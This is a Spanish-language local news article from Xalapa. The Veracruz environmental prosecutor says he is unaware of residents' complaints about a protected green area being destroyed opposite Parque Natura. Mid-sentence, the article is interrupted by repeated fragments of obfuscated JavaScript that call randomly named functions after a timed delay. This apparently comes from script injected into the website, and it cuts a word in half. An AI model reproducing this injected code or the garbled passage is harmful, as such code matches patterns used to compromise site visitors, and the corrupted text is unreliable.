Desconocen PMA sobre posible destrucción de área verde frente a Parque Natura

Yhadira Paredes. Xalapa. Luego de que vecinos de la reserva territorial denunciaran la destrucción de un área natural protegida frente al Parque Natura en la capital del estado, el procurador de Medio Ambiente de Veracruz, Ricardo Colorado Alfonso, dijo desconocer el tema. 

Entrevistado posterior a la Guardia de Honor en el monumento a Don Miguel Hidalgo y Costilla indicó que cabe la posibilidad de que esta denuncia esté en proceso, pero no lo sabe a ciencia cierta.

Cuestionado al respecto, preguntó a sus asistentes y respondió “haremos la vigilancia”. 

Hay que recordar que el miércoles, en rueda de prensa, habitantes de la zona aseguraron que la zona está siendo talada y rellenada para la construcción de locales comerciales y están acabandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o con un área de amortiguamiento ambiental. 

El funcionario afirmó que la responsabilidad de la dependencia a su cargo es hacer la inspección, pero insistió en que no tiene el dato de la posible destrucción.

Sin embargo, aseguró que los inspectores donde detectan una construcción sospechosa hacen la supervisión necesaria, pero hizo un llamado a los ciudadanos a denunciar cualquier situación irregular. 

El procurador de Medio Ambiente detalló que se llevan al momento 300 inspecciones en el estado, de las cuales 150 provienen de denuncias ciudadanas y el resto de la Secretaría de Medio Ambiente.

Finalmente, aseveró que se han emitido sanciones económicas y clausuras en contra de empresas que construyen en lugares no permitidos, pero en el caso de la Reserva Territorial de Xalapa, no tenían conocimiento. 

Deja un comentario

Tu dirección de correo electrónico no será publicada.

Back to top button
Close